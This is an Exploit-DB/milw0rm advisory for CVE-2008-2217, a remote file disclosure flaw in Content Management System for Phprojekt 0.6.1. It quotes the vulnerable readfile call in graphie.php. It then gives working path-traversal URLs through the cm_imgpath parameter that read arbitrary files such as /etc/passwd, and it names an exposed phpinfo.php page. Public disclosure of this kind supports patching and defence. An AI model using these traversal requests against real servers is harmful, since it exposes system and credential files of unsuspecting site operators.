Content Management System for Phprojekt 0.6.1 - File Disclosure

Author: Houssamix
type: webapps
platform: php
port: 
date_added: 2008-04-26 
date_updated: 2016-12-02 
verified: 1 
codes: OSVDB-45326;CVE-2008-2217 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comcm4p_0.6.1.zip

--------------------------------------------------------------------------------------------------------------
----- H-T Team [ HouSSaMix + ToXiC350 ] from MoroCCo ---------------------------------------------------------
--------------------------------------------------------------------------------------------------------------

= Author : HouSSaMix
= Script : 	Content Management System for Phprojekt
= version : 0.6.1
= Download : http://www.mariovaldez.net/software/cm_4p/download.php


= BUG  :  Remote File Disclosure Vulnerability

 Vulnerable CODE :
~~~~~~~~ graphie.php ~~~~~~~~~~~~~~~~~
readfile ($cm_imgpath . "/t.gif");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
variable " $cm_imgpath " not declared

= Exploit :

target.com/cm/graphie.php?cm_imgpath=../.././../[file]
target.com/cm/graphie.php?cm_imgpath=../.././../etc/passwd

= see phpinfo
target.com/cm/phpinfo.php



= greetz :	V40 - marwen.neo and all muslims Hackers

=================================================================================================================

# milw0rm.com [2008-04-27]